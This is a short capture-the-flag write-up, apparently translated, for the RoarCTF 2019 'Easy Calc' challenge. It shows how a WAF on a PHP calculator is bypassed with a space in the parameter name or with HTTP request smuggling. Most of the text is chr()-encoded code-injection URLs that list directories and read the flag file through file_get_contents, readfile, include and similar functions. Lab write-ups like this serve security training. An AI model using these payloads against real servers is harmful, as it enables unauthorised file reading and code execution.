Title address: https://buuoj.cn/challenges#[RoarCTF%202019]Easy%20Calc
View source code
Packet capture foundcalc.php
accesshttp://node3.buuoj.cn:28908/calc.php
Obviously, code execution is bypassed. The previous source code also said that there is WAF. There are two ways to bypass WAF.
- In
num
before adding%20
to bypass the detection of the num - Duplicate Content-Length bypass of HTTP smuggling
First look phpinfo()
, a lot of functions are disabled
Use scandir()
function + chr()
function to bypass code execution
/calc.php?%20num=var_dump(scandir(chr(47)))
Or use glob()
function
/calc.php?%20num=var_dump(glob(chr(47).chr(42)))
Root directory discoveryf1agg
Use file_get_contents()
to read
/calc.php?%20num=file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
Or other fancy file reading operations
/calc.php?%20num=show_source(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
/calc.php?%20num=print_r(php_strip_whitespace(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
/calc.php?%20num=readfile(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
/calc.php?%20num=var_dump(file(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))
/calc.php?%20num=include(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))
.......
Content-Type of HTTP smuggling repeatedly bypasses WAF